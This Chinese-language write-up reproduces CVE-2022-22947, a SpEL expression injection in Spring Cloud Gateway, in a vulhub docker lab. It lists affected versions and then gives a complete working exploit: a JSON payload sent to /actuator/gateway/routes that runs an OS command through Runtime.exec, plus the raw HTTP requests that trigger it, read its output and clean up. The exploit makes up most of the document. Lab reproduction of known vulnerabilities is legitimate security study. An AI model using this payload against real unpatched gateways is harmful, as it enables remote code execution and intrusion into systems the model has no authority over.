漏洞描述
2022年3月1日,VMware官方发布漏洞报告,在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行
影响版本
Spring Cloud Gateway 3.1.x< 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
旧的、不受支持的版本也会受到影响
漏洞原理
Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本(包含)以前存在一处SpEL表达式注入漏洞,当攻击者可以访问Actuator API的情况下,将可以利用该漏洞执行任意命令
环境搭建
-
进入靶场
-
cd vulhub/spring/CVE-2022-22947
-
开启靶场
-
docker-compose up -d
-
查看靶场信息
-
docker ps
-
访问网址
-
http://youip:8080
漏洞复现
抓包
以POST方法请求/actuator/gateway/routes/hacktest
,将Content-Type: application/x-www-form-urlencoded
改为Content-Type: application/json
,并提交以下数据,用于创建一条恶意路由:{ "id": "1_Rytest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } }], "uri": "http://example.com" }
然后应用刚添加的路由发送如下数据包,此数据包会触发表达式执行:
POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.198.129:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
发送如下数据包可查看结果:
GET /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.198.129:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
最后发送如下数据包进行清理,删除所添加的路由:
DELETE /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.198.129:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close
再次刷新路由
POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.198.129:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 0
最后关闭镜像
- docker-compose down